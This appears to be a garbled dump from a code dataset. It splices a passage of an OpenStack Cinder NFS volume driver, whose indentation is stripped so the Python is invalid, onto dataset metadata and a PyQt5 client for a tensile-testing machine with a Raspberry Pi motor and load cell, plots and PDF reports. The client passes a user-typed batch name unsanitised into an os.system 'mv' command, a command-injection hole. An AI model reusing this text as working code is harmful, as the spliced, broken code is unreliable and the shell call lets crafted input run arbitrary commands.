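            # 'nfs://192.168.1.10:2049/exports/images/cirros.img' the match below
            # yields conn='192.168.1.10:2049' and dr='/exports/images'.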
matched = re.match(nfs_loc_pattern, image_location, flags=0)
if not matched:
LOG.debug('Image location not in the'
' expected format %s', image_location)
else:
conn = matched.group(2)
dr = matched.group(3) or '/'
return conn, dr
def _share_match_for_ip(self, ip, shares):
"""Returns the share that is served by ip.
Multiple shares can have same dir path but
can be served using different ips. It finds the
share which is served by ip on same nfs server.
"""
raise NotImplementedError()
def _check_share_in_use(self, conn, dir):
"""Checks if share is cinder mounted and returns it."""
try:
if conn:
host = conn.split(':')[0]
ip = na_utils.resolve_hostname(host)
share_candidates = []
for sh in self._mounted_shares:
sh_exp = sh.split(':')[1]
if sh_exp == dir:
share_candidates.append(sh)
if share_candidates:
LOG.debug('Found possible share matches %s',
share_candidates)
return self._share_match_for_ip(ip, share_candidates)
except Exception:
LOG.warning(_LW("Unexpected exception while "
"short listing used share."))
return None
def _construct_image_nfs_url(self, image_location):
"""Construct direct url for nfs backend.
It creates direct url from image_location
which is a tuple with direct_url and locations.
Returns array of urls with nfs scheme if nfs store
else returns url. It needs to be verified
by backend before use.
"""
direct_url, locations = image_location
if not direct_url and not locations:
raise exception.NotFound(_('Image location not present.'))
urls = []
if not locations:
urls.append(direct_url)
else:
for location in locations:
url = location['url']
if not location['metadata']:
urls.append(url)
break
location_type = location['metadata'].get('type')
if not location_type or location_type.lower() != "nfs":
urls.append(url)
break
share_location = location['metadata'].get('share_location')
mountpoint = location['metadata'].get('mountpoint')
if not share_location or not mountpoint:
urls.append(url)
break
url_parse = urlparse.urlparse(url)
abs_path = os.path.join(url_parse.netloc, url_parse.path)
rel_path = os.path.relpath(abs_path, mountpoint)
direct_url = "%s/%s" % (share_location, rel_path)
urls.append(direct_url)
return urls
def extend_volume(self, volume, new_size):
"""Extend an existing volume to the new size."""
LOG.info(_LI('Extending volume %s.'), volume['name'])
path = self.local_path(volume)
self._resize_image_file(path, new_size)
def _is_share_vol_compatible(self, volume, share):
"""Checks if share is compatible with volume to host it."""
raise NotImplementedError()
def _check_share_can_hold_size(self, share, size):
"""Checks if volume can hold image with size."""
_tot_size, tot_available = self._get_capacity_info(
share)
if tot_available < size:
msg = _("Container size smaller than required file size.")
raise exception.VolumeDriverException(msg)
def _move_nfs_file(self, source_path, dest_path):
"""Moves source to destination."""
@utils.synchronized(dest_path, external=True)
def _move_file(src, dst):
if os.path.exists(dst):
LOG.warning(_LW("Destination %s already exists."), dst)
return False
self._execute('mv', src, dst, run_as_root=self._execute_as_root)
return True
try:
return _move_file(source_path, dest_path)
except Exception as e:
LOG.warning(_LW('Exception moving file %(src)s. Message - %(e)s')
% {'src': source_path, 'e': e})
return False
def _get_export_ip_path(self, volume_id=None, share=None):
"""Returns export ip and path.
One of volume id or share is used to return the values.
"""
if volume_id:
host_ip = self._get_host_ip(volume_id)
export_path = self._get_export_path(volume_id)
elif share:
host_ip = share.split(':')[0]
export_path = share.split(':')[1]
else:
raise exception.InvalidInput(
'A volume ID or share was not specified.')
return host_ip, export_path
def _get_share_capacity_info(self, nfs_share):
"""Returns the share capacity metrics needed by the scheduler."""
used_ratio = self.configuration.nfs_used_ratio
oversub_ratio = self.configuration.nfs_oversub_ratio
# The scheduler's capacity filter will reduce the amount of
# free space that we report to it by the reserved percentage.
reserved_ratio = 1 - used_ratio
reserved_percentage = round(100 * reserved_ratio)
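        # e.g. nfs_used_ratio = 0.95 -> reserved_ratio = 0.05 -> reserved_percentage = 5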
total_size, total_available = self._get_capacity_info(nfs_share)
apparent_size = total_size * oversub_ratio
apparent_size_gb = na_utils.round_down(
apparent_size / units.Gi, '0.01')
apparent_free_size = total_available * oversub_ratio
apparent_free_gb = na_utils.round_down(
float(apparent_free_size) / units.Gi, '0.01')
capacity = dict()
capacity['reserved_percentage'] = reserved_percentage
capacity['total_capacity_gb'] = apparent_size_gb
capacity['free_capacity_gb'] = apparent_free_gb
return capacity
def _get_capacity_info(self, nfs_share):
"""Get total capacity and free capacity in bytes for an nfs share."""
export_path = nfs_share.rsplit(':', 1)[1]
return self.zapi_client.get_flexvol_capacity(export_path)
def _check_volume_type(self, volume, share, file_name):
"""Match volume type for share file."""
raise NotImplementedError()
def _convert_vol_ref_share_name_to_share_ip(self, vol_ref):
"""Converts the share point name to an IP address
The volume reference may have a DNS name portion in the share name.
Convert that to an IP address and then restore the entire path.
:param vol_ref: Driver-specific information used to identify a volume
:return: A volume reference where share is in IP format.
"""
# First strip out share and convert to IP format.
share_split = vol_ref.rsplit(':', 1)
vol_ref_share_ip = na_utils.resolve_hostname(share_split[0])
# Now place back into volume reference.
vol_ref_share = vol_ref_share_ip + ':' + share_split[1]
return vol_ref_share
def _get_share_mount_and_vol_from_vol_ref(self, vol_ref):
"""Get the NFS share, the NFS mount, and the volume from reference
Determine the NFS share point, the NFS mount point, and the volume
(with possible path) from the given volume reference. Raise exception
if unsuccessful.
:param vol_ref: Driver-specific information used to identify a volume
:return: NFS Share, NFS mount, volume path or raise error
"""
# Check that the reference is valid.
if 'source-name' not in vol_ref:
reason = _('Reference must contain source-name element.')
raise exception.ManageExistingInvalidReference(
existing_ref=vol_ref, reason=reason)
vol_ref_name = vol_ref['source-name']
self._ensure_shares_mounted()
# If a share was declared as '1.2.3.4:/a/b/c' in the nfs_shares_config
# file, but the admin tries to manage the file located at
# 'my.hostname.com:/a/b/c/d.vol', this might cause a lookup miss below
# when searching self._mounted_shares to see if we have an existing
# mount that would work to access the volume-to-be-managed (a string
# comparison is done instead of IP comparison).
vol_ref_share = self._convert_vol_ref_share_name_to_share_ip(
vol_ref_name)
for nfs_share in self._mounted_shares:
cfg_share = self._convert_vol_ref_share_name_to_share_ip(nfs_share)
(orig_share, work_share, file_path) = \
vol_ref_share.partition(cfg_share)
if work_share == cfg_share:
file_path = file_path[1:] # strip off leading path divider
LOG.debug("Found possible share %s; checking mount.",
work_share)
nfs_mount = self._get_mount_point_for_share(nfs_share)
vol_full_path = os.path.join(nfs_mount, file_path)
if os.path.isfile(vol_full_path):
LOG.debug("Found share %(share)s and vol %(path)s on "
"mount %(mnt)s",
{'share': nfs_share, 'path': file_path,
'mnt': nfs_mount})
return nfs_share, nfs_mount, file_path
else:
LOG.debug("vol_ref %(ref)s not on share %(share)s.",
{'ref': vol_ref_share, 'share': nfs_share})
raise exception.ManageExistingInvalidReference(
existing_ref=vol_ref,
reason=_('Volume not found on configured storage backend.'))
def manage_existing(self, volume, existing_vol_ref):
"""Manages an existing volume.
The specified Cinder volume is to be taken into Cinder management.
The driver will verify its existence and then rename it to the
new Cinder volume name. It is expected that the existing volume
reference is an NFS share point and some [/path]/volume;
e.g., 10.10.32.1:/openstack/vol_to_manage
or 10.10.32.1:/openstack/some_directory/vol_to_manage
:param volume: Cinder volume to manage
:param existing_vol_ref: Driver-specific information used to identify a
volume
"""
# Attempt to find NFS share, NFS mount, and volume path from vol_ref.
(nfs_share, nfs_mount, vol_path) = \
self._get_share_mount_and_vol_from_vol_ref(existing_vol_ref)
LOG.debug("Asked to manage NFS volume %(vol)s, with vol ref %(ref)s",
{'vol': volume['id'],
'ref': existing_vol_ref['source-name']})
self._check_volume_type(volume, nfs_share, vol_path)
if vol_path == volume['name']:
LOG.debug("New Cinder volume %s name matches reference name: "
"no need to rename.", volume['name'])
else:
src_vol = os.path.join(nfs_mount, vol_path)
dst_vol = os.path.join(nfs_mount, volume['name'])
try:
shutil.move(src_vol, dst_vol)
LOG.debug("Setting newly managed Cinder volume name to %s",
volume['name'])
self._set_rw_permissions_for_all(dst_vol)
except (OSError, IOError) as err:
exception_msg = (_("Failed to manage existing volume %(name)s,"
" because rename operation failed:"
" Error msg: %(msg)s."),
{'name': existing_vol_ref['source-name'],
'msg': err})
raise exception.VolumeBackendAPIException(data=exception_msg)
return {'provider_location': nfs_share}
def manage_existing_get_size(self, volume, existing_vol_ref):
"""Returns the size of volume to be managed by manage_existing.
When calculating the size, round up to the next GB.
:param volume: Cinder volume to manage
:param existing_vol_ref: Existing volume to take under management
"""
# Attempt to find NFS share, NFS mount, and volume path from vol_ref.
(nfs_share, nfs_mount, vol_path) = \
self._get_share_mount_and_vol_from_vol_ref(existing_vol_ref)
try:
LOG.debug("Asked to get size of NFS vol_ref %s.",
existing_vol_ref['source-name'])
file_path = os.path.join(nfs_mount, vol_path)
file_size = float(utils.get_file_size(file_path)) / units.Gi
vol_size = int(math.ceil(file_size))
except (OSError, ValueError):
exception_message = (_("Failed to manage existing volume "
"%(name)s, because of error in getting "
"volume size."),
{'name': existing_vol_ref['source-name']})
raise exception.VolumeBackendAPIException(data=exception_message)
LOG.debug("Reporting size of NFS volume ref %(ref)s as %(size)d GB.",
{'ref': existing_vol_ref['source-name'], 'size': vol_size})
return vol_size
def unmanage(self, volume):
"""Removes the specified volume from Cinder management.
Does not delete the underlying backend storage object. A log entry
will be made to notify the Admin that the volume is no longer being
managed.
:param volume: Cinder volume to unmanage
"""
CONF = cfg.CONF
vol_str = CONF.volume_name_template % volume['id']
vol_path = os.path.join(volume['provider_location'], vol_str)
LOG.info(_LI("Cinder NFS volume with current path \"%(cr)s\" is "
"no longer being managed."), {'cr': vol_path})
| [
"[email protected]"
] | |
2bf3f597e8025c8b8805d3462d370391acaf8535 | fd97689f062e6d90837ea27b9a5e3de87bcd1e92 | /Cliente/MET.py | 1037d266937331ca50ced2198eb1c3abeead74d4 | [] | no_license | Edresson/MET | 9f7b8a43bdea29ee844d0c98a20f0aef4afbcdd2 | 5945116d0d52fdf8f892a5f266bf6b51afb529eb | refs/heads/master | 2023-08-31T10:18:35.942324 | 2019-10-29T12:17:15 | 2019-10-29T12:17:15 | 93,848,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75,202 | py | # -*- coding: utf-8 -*-
import pygame
import sys
import os
#from qtpy import QtCore, QtGui
from PyQt5 import QtCore, QtGui, QtWidgets,QtTest
import time
from matplotlib.figure import Figure
#from qtpy import QtTest
from threading import Thread
#from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
import threading
import matplotlib.pyplot as plt
import math
import pickle
##### imports celula e motor####
#from Modulos import celula
from Modulos import clientMotor
Motor = clientMotor
from Modulos import clientCelula
celula = clientCelula
from Modulos import webcam
#from Modulos import celula
#
#from Modulos import celula
### PDF Imports ###
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm, mm, inch, pica
import os.path
from datetime import datetime
from reportlab.lib.utils import ImageReader
from io import BytesIO
from PIL import Image
from reportlab.pdfbase.pdfmetrics import stringWidth
webc = webcam.Webcam()
celping = celula.ping()
motping= Motor.ping()
log_file=open('MET_Logs.log', 'w')
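# Startup connectivity check: ping the load-cell and motor services on the
# Raspberry Pi and log any problem to MET_Logs.log before the GUI is started.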
if celping[0] == 0:
print("Aparentemente o Raspberry Pi não está connectado no Roteador, ou aconteceu algo de errado com o mesmo,Verifique se o mesmo está com o IP:",celping[1]," Se ele está connectado no mesmo roteador que o Notebook , ou ainda se a Porta UDP :",celping[2]," não está em uso por outro serviço nesta rede \n \n",file=log_file)
#nao está pingando
else:
print(" Ping Ok ! Raspberry Pi está configurado corretamente \n",file=log_file)
if motping[0] == 0:
print("Aparentemente o Raspberry Pi não está connectado no Roteador, ou aconteceu algo de errado com o mesmo,Verifique se o mesmo está com o IP:",motping[1]," Se ele está connectado no mesmo roteador que o Notebook , ou ainda se a Porta UDP :",motping[2]," não está em uso por outro serviço nesta rede\n \n",file=log_file)
#nao está pingando
else:
print(" Ping Ok ! Raspberry Pi está configurado corretamente \n"," Caso não seja altere no arquivo IP-Raspberry.txt ",file=log_file)
if motping[0] == 1 and celping[0] == 0 :
print(" Aparentemente o Problema está com a port UDP: ",celping[2]," Você pode ter aberto 2 instancias do software ao mesmo tempo , reinicie o Notebook, se persistir reiniciei também o RaspBerry Pi",file=log_file)
sys.exit()
elif motping[0] == 0 and celping[0] == 1 :
print(" Aparentemente o Problema está com a port UDP:",motping[2]," Caso não seja altere no arquivo IP-Raspberry.txt ",file=log_file)
sys.exit()
elif motping[0] == 0 and celping[0] == 0:
print(" Aparentemente o Problema está no Raspberry Pi, Verifique se o ip dele é mesmo:",motping[1],file=log_file)
sys.exit()
Motor.start_thread()
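# Module-level state shared between the GUI and the acquisition/plotting code:
# the list of completed tests, the live force/displacement arrays, the test
# limits (force/displacement cut-offs) and the control flags used to stop the
# measurement loop.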
testes = []
contando = 0
fig = plt.figure(figsize=(9,9))
tipodeensaio = 0
FormatoCorpoProva = 0
AreaCorpoProva = 0
deslocamentos = []
forcas = []
flag = 0
flag2 =0
tempinicioteste = 0
qforca = None
maxforca = None
maxdeslocamento = None
VelocidadeEn = 0
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtWidgets.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtWidgets.QApplication.translate(context, text, disambig)
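# The two try/except blocks above are PyQt4/PyQt5 compatibility shims: on PyQt5
# there is no QString.fromUtf8 or UnicodeUTF8, so _fromUtf8 becomes a no-op and
# _translate falls back to QApplication.translate without an encoding argument.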
class Ui_MainWindow():
def __init__(self):
self.result= QtWidgets.QMessageBox()
self.result.setText("Você deseja fazer mais um teste nesse lote?")
self.result.addButton(QtWidgets.QMessageBox.Yes)
self.result.addButton(QtWidgets.QMessageBox.No)
self.webcam_fim= QtWidgets.QMessageBox()
self.webcam_fim.setText("Você deseja tirar uma foto do objeto?")
self.webcam_fim.addButton(QtWidgets.QMessageBox.Yes)
self.webcam_fim.addButton(QtWidgets.QMessageBox.No)
self.ensaiologin = False
self.filedir = 0
self.u = []
self.thread3 = ServerThread()
self.Index=0
self.Index22 =0
self.text= str()
self.A = []
self.Linhas=[]
self.Grafic = QtWidgets.QWidget()
self.Grafic.setObjectName(_fromUtf8("Grafic"))
self.verticalLayoutWidget = QtWidgets.QWidget(self.Grafic)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(50, 80, 871, 411))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.frame = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.frame.setObjectName(_fromUtf8("verticalLayout_2"))
self.t=1
self.fig = Figure(figsize=(5,5), dpi=100)
self.ax1f1 = self.fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
        self.line1, = self.ax1f1.plot([], [])
        self.ax1f1.grid(True)
        # A single FigureCanvas is enough here; it attaches itself to self.fig.
        self.canvas = FigureCanvas(self.fig)
        self.frame.addWidget(self.canvas)
        self.canvas.draw()
self.toolbar = NavigationToolbar(self.canvas,
self.Grafic, coordinates=True)
self.frame.addWidget(self.toolbar)
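    # Load-cell configuration lives in two plain-text files:
    #   conf_celulas.txt      one cell per line, stored as "name;calibration_factor"
    #   Fator_Calibracao.txt  the factor of the currently selected cell
    # selecionar() below copies the chosen factor into Fator_Calibracao.txt and
    # re-initialises the load-cell client with it.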
def selecionar(self):
text = self.combo.currentText()
self.text = text.replace(" Celula de Carga Fator:",";")
self.t = ''
for i in self.text:
if(i != ';'):
self.t = self.t + i
else:
self.t =''
#print(self.text,self.t)
self.CALIBRA = open("Fator_Calibracao.txt","w")
self.CALIBRA.write(self.t)
self.CALIBRA.close()
celula.iniciarcel(self.t)
self.updateCelulaInterface()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setText(_translate("MainWindow", "Celula: "+self.text+" Selecionada, Agora a maquina Opera com esta Celula de Carga",None))
self.obs3.show()
def combo2_chosen(self, text=0):
text = self.combo2.currentText()
self.Index=self.combo2.currentIndex()
self.Index22 = str(text)
def combo_chosen(self, text=0):
text = self.combo.currentText()
self.Index=self.combo.currentIndex()
self.text = text.replace(" Celula de Carga Fator:",";")
def Excluir(self):
self.combo.removeItem(self.Index)
for i, valor in enumerate(self.A):
if valor == self.text:
self.A.pop(i)
self.CALIBRA = open("conf_celulas.txt","w")
for i in self.A:
self.CALIBRA.write(str(i))
self.CALIBRA.close()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setText(_translate("MainWindow", "Celula: " +self.text+ " Excluida",None))
self.obs3.show()
def ecalibrar(self):
self.bcal.hide()
self.ecal.hide()
self.obs3.setText(_translate("MainWindow", "Calibrando Celula de Carga Aguarde ! ",None))
VALUE_SERIAL= celula.calibrar()
B = self.pcal.value()
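        # Calibration factor = raw reading returned by the cell with the
        # reference weight applied, divided by that reference weight in kg.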
Fator= (float(VALUE_SERIAL)/float(B))
print(Fator,B,VALUE_SERIAL)
self.combo.clear()
self.t = str()
for i, valor in enumerate(self.A):
if valor == self.text:
self.posicao = i
self.p = 0
self.j =0
while(self.p == 0):
if(self.A[i][self.j] != ';'):
self.t= self.t + self.A[i][self.j]
self.j += 1
else:
self.p =1
self.A.pop(i)
self.A.append(self.t+";"+str(Fator)+"\n")
self.CALIBRA = open("conf_celulas.txt","w")
for k in self.A:
self.CALIBRA.write(k)
self.CALIBRA.close()
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Celula de Carga Calibrada agora você já pode Colocar novamente as Garras/Mordentes\n Celula: "+self.t,None))
self.bcal.show()
self.ecal.show()
self.pcal.hide()
def editCalibra(self):
self.bcal2.hide()
self.obs3.hide()
celula.tare()
self.pcal = QtWidgets.QDoubleSpinBox(self.Calibra)
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal.hide()
self.ecal.hide()
self.pcal.setGeometry(QtCore.QRect(210,240,81,29))
self.pcal.setObjectName(_fromUtf8("pcal"))
self.pcal.setRange(0,10000.00)
self.pcal.setValue(1.00)
self.pcal.show()
self.obs3.setGeometry(QtCore.QRect(20,190,741,71))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "Informe o Valor do Peso Padrão (EM KG), após coloque o mesmo na celula de Carga e Clique em continuar.",None))
self.obs3.show()
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.show()
self.bcal2.clicked.connect(self.ecalibrar)
def editcalib(self):
self.combo.hide()
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.clicked.connect(self.editCalibra)
self.bcal2.show()
self.bcal.hide()
self.ecal.hide()
self.ccal.hide()
self.dcal.hide()
self.scal.hide()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, após Clique em Continuar.",None))
self.obs3.show()
def add_nova(self):
self.combo.hide()
self.obs3.hide()
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.clicked.connect(self.calibrar)
self.bcal2.show()
self.bcal.hide()
self.ecal.hide()
self.scal.hide()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, após Clique em Continuar.",None))
self.obs3.show()
def Editar(self):
self.scal.show()
self.obs3.hide()
self.ecal.hide()
self.bcal.hide()
self.ccal = QtWidgets.QPushButton(self.Calibra)
self.ccal.setGeometry(QtCore.QRect(150,110,131,29))
self.ccal.setObjectName(_fromUtf8("bcal"))
self.dcal = QtWidgets.QPushButton(self.Calibra)
self.dcal.setGeometry(QtCore.QRect(530,110,151,29))
self.dcal.setObjectName(_fromUtf8("bcal"))
self.combo.setGeometry(QtCore.QRect(290,20,192,40))
self.combo.setObjectName(_fromUtf8("pcal"))
self.combo.show()
self.dcal.setText(_translate("MainWindow", "Excluir",None))
self.ccal.setText(_translate("MainWindow", "Calibrar",None))
self.dcal.clicked.connect(self.Excluir)
self.ccal.clicked.connect(self.editcalib)
self.ccal.show()
self.dcal.show()
self.CALIBRA = open("conf_celulas.txt","r")
self.A = self.CALIBRA.readlines()
self.CALIBRA.close()
self.CALIBRA = open("conf_celulas.txt","a")
self.b=[]
for i in range(len(self.A)):
self.b.append(self.A[i].replace(";"," Celula de Carga Fator:"))
self.combo.addItems(self.b)
#self.combo.connect(self.combo, QtCore.SIGNAL('activated(QString)'), self.combo_chosen)
self.combo.activated.connect(self.combo_chosen)
self.CALIBRA.close()
def resetgrafic(self):
        # These are module-level globals; without the declaration the
        # assignments would only create locals and the plot would not reset.
        global deslocamentos, forcas
        deslocamentos = [0]
        forcas = [0]
self.PlotGrafico()
def PlotGrafico(self):
self.line1.set_data(deslocamentos, forcas)
self.fig.canvas.draw()
def zeraf(self):
self.Forca_grafic.setValue(0.00)
def zerades(self):
self.Deslocamento_grafic.setValue(0.00)
def Subir(self):
self.pushButton_3.setDisabled(True)
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Subir_descer(self.Vel_ajuste.value(),1,self.deslb.value())
self.pushButton_3.setDisabled(False)
def Descer(self):
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Subir_descer(self.Vel_ajuste.value(),2,self.deslb.value())
def Parando(self):
global flag
flag =0
global flag2
global deslocamentos
global forcas
global testes
self.u = []
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
self.pushButton.setVisible(True)
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
Motor.Parar()
self.confirmar_continuacao()
def confirmar_continuacao(self):
result_webcam_fim = self.webcam_fim.exec_()
if result_webcam_fim == QtWidgets.QMessageBox.No:
pass
if result_webcam_fim== QtWidgets.QMessageBox.Yes:
self.webcamcapture_final()
result1 = self.result.exec_()
if result1 == QtWidgets.QMessageBox.Yes:
self.Config.setCurrentWidget(self.Config)
lotes(self.input.text(),deslocamentos,forcas)
self.Config.setCurrentWidget(self.Config_2)
if result1 == QtWidgets.QMessageBox.No:
self.inputl.show()
self.input.show()
self.botaobrowser.show()
lotes(self.input.text(),deslocamentos,forcas,)
self.ax1f1.cla()
self.ax1f1.grid(True)
self.pushButton.hide()
if(len(testes) > 0):
pass
self.Linhas = []
self.combo2.setGeometry(QtCore.QRect(90,20,192,30))
self.combo2.setObjectName(_fromUtf8("p2cal"))
self.combo2.show()
self.bcombo.setGeometry(QtCore.QRect(90,50,61, 31))
self.bcombo.setText(_translate("MainWindow", "Excluir", None))
self.bcombo.clicked.connect(self.excluirlinha_grafic)
self.bcombo.setObjectName(_fromUtf8("p2cal"))
self.bcombo.show()
for i in range(0,len(testes)):
self.u.append(testes[i]["nome"])
self.aux, = self.ax1f1.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
self.Linhas.append(self.aux)
self.ax1f1.legend(loc ='best')
self.fig.canvas.draw()
self.combo2.addItems(self.u)
#self.combo2.connect(self.combo2, QtCore.SIGNAL('activated(QString)'), self.combo2_chosen)
self.combo2.activated.connect(self.combo2_chosen)
contando = 0
self.pushButton_6.show()
self.pushButton_7.show()
pass
def returnposteste(self,index):
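        # Returns the position in the global 'testes' list of the test whose
        # "nome" field matches 'index' (the label shown in the combo box).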
global testes
for i in range(0,len(testes)):
if(str(testes[i]["nome"]) == str(index)):
return i
def cancelartestes(self) :
global testes
global contando
contando = 0
testes = []
self.bcombo.hide()
self.combo2.clear()
self.pushButton_6.hide()
self.pushButton_7.hide()
self.combo2.hide()
self.ax1f1.cla()
self.ax1f1.grid(True)
self.line1, = self.ax1f1.plot([],[])
self.fig.canvas.draw_idle()
self.pushButton.show()
def gerarpdf(self):
global testes
self.bcombo.hide()
self.pushButton_6.hide()
self.pushButton_7.hide()
global VelocidadeEn
global forcas
global deslocamentos
global FormatoCorpoProva
global fig
fig2 = []
Image2 = []
imgdata2 = []
now = datetime.now()
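        # Reports are filed under
        # Ensaios/<year>/<month>/<day>/<lote>Hora<h>-<m>-<s>/ ; the directory
        # tree is created below if it does not exist yet.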
if os.path.isdir("Ensaios/"+str(now.year)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)) # aqui criamos o diretorio
if os.path.isdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)): # vemos de este diretorio já existe
pass
else:
os.mkdir("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)) # aqui criamos o diretorio
listdir1 = os.listdir('TempImagens/')
print(os.listdir('TempImagens/'))
for i in listdir1:
os.system('mv '+'TempImagens/'+i+" Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+str(i))
Forcamaxima = forcas[-1]
maxdeslocamento = deslocamentos[-1]
Posicaomaxima = deslocamentos[-1]
pdf2 = Canvas("Ensaios/"+"Ensaio_Atual.pdf", pagesize = letter) #Nome do arquivo e Tipo do papel
pdf = Canvas("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+str(self.input.text())+"Hora:"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+".pdf", pagesize = letter) #Nome do arquivo e Tipo do papel
pdf.setFont('Helvetica-Bold', 12)
pdf2.setFont('Helvetica-Bold', 12)
tupla = (' Máquina de Ensaio de Tração e Compressão', '','','','','','','','', ' Ensaio','', 'N° da Solicitação: _________', 'Solicitante/Setor: __________________________________','Inspetor: ___________________________________','Responsável: ___________________________________','' ,
'Data: ' + str(now.day)+'/'+str(now.month)+'/'+str(now.year), 'Hora: ' + str(now.hour)+":"+str(now.minute)+ ":"+ str(now.second) ,'', '', '','' ,'')
lista = pdf.beginText(inch * 1, inch * 10)
lista2 = pdf2.beginText(inch * 1, inch * 10)
for i in range(0,len(tupla)):
lista.textLine(tupla[i])
lista2.textLine(tupla[i])
fig.clf()
ax = fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
ax.grid(True)
for i in range(0,len(testes)):
ax.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
ax.legend(loc ='best')
with open("Ensaios/"+str(now.year)+"/"+str(now.month)+"/"+str(now.day)+"/"+str(self.input.text())+"Hora"+str(now.hour)+"-"+str(now.minute)+ "-"+ str(now.second)+"/"+"save.txt","wb") as fp:
pickle.dump(testes,fp)
"""CALIBRA.write(str(testes)+"\n")
CALIBRA.close()"""
imgdata = BytesIO()
fig.savefig(imgdata, format='png')
imgdata.seek(0) # rewind the data
Image = ImageReader(imgdata)
pdf2.drawText(lista2)
pdf.drawText(lista)
pdf2.drawImage(Image ,130,50, width=400,height=350)
pdf.drawImage(Image ,130,50, width=400,height=350)
pdf2.showPage()
pdf.showPage()
for j in range(0,len(testes)):
fig.clf()
ax2= fig.add_subplot(111,xlabel='Deslocamento(mm)', ylabel='Força(N)', title='')
#ax2.cla()
ax2.grid(True)
ax2.plot(list(testes[j]["x1"]),list(testes[j]["x2"]))
X = list(testes[j]["x1"]).copy()
Y = list(testes[j]["x2"]).copy()
X.sort()
Y.sort()
xmax = X[-1]
ymax = Y[-1]
if testes[j]["area"] == 0.0:
testes[j]["area"] = '_______'
tupla = ( '','','','',' Nome Ensaio: '+str(testes[j]["nome"]),'','Tipo de ensaio: '+str(testes[j]["tipo"]) ,
'Formato do corpo de prova: '+str(testes[j]["formato"] ),
'Posição Máxima: '+str( xmax )+" mm",'Força Máxima: '+str(ymax)+'N', 'Área do corpo de prova: '+str(testes[j]["area"])+' mm²', 'Velocidadede ensaio: '+str(testes[j]["vel"])+' mm/min','Comprimento do corpo de prova: __________ mm' ,)
lista3 = pdf.beginText(inch * 1, inch * 10)
lista4 = pdf2.beginText(inch * 1, inch * 10)
for i in range(0,len(tupla)):
lista3.textLine(tupla[i])
lista4.textLine(tupla[i])
pdf.drawText(lista3)
imgdata2 = BytesIO()
fig.savefig(imgdata2 , format='png')
imgdata2.seek(0) # rewind the data
Image2 = ImageReader(imgdata2)
pdf2.drawText(lista3)
pdf.drawText(lista4)
pdf2.drawImage(Image2 ,130,50, width=400,height=350)
